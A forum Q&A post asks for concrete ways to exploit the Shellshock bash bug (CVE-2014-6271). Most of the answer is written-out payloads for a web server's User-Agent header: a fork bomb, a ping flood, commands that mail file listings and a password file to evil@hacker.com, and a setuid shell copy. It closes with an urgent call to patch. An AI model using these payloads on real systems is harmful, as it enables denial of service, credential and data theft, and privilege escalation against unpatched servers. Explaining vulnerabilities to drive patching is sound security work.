Can we exploit the shellshock bash bug?

558    Asked by AdityaYadav in Cyber Security , Asked on Mar 24, 2022

I read some articles about the Shellshock Bash bug (CVE-2014-6271 reported Sep 24, 2014) and have a general idea of what the vulnerability is and how it could be exploited. To better understand the implications of the bug, what would be a simple and specific example of an attack vector / scenario that could exploit the bug?

Answered by Amit raj

With access to shellshock bash, even from the POV of a web user, the options are endless. For example, here's a fork bomb:


() { :; }; ){ : & };:
Just put that in a user agent string on a browser, go to your web page, and instant DoS on your web server.
Or, somebody could use your server as an attack bot:
() { :; }; ping -s 1000000
Put that on several other servers and you're talking about real bandwidth.
Other attack vectors:
# theft of data
() { :; }; find ~ -print | mail -s "Your files" evil@hacker.com
() { :; }; cat ~/.secret/passwd | mail -s "This password file" evil@hacker.com
# setuid shell
() { :; }; cp /bin/bash /tmp/bash && chmod 4755 /tmp/bash

There's endless other possibilities: reverse shells, running servers on ports, auto-downloading some rootkit to go from web user to root user. It's a shell! It can do anything. As far as security disasters go, this is even worse than Heartbleed. The important part is that you patch your system. NOW! If you still have external-facing servers that are still unpatched, what are you doing still reading this?! Hackers are already doing these things above, and you don't even know it!



Your Answer

Interviews

Parent Categories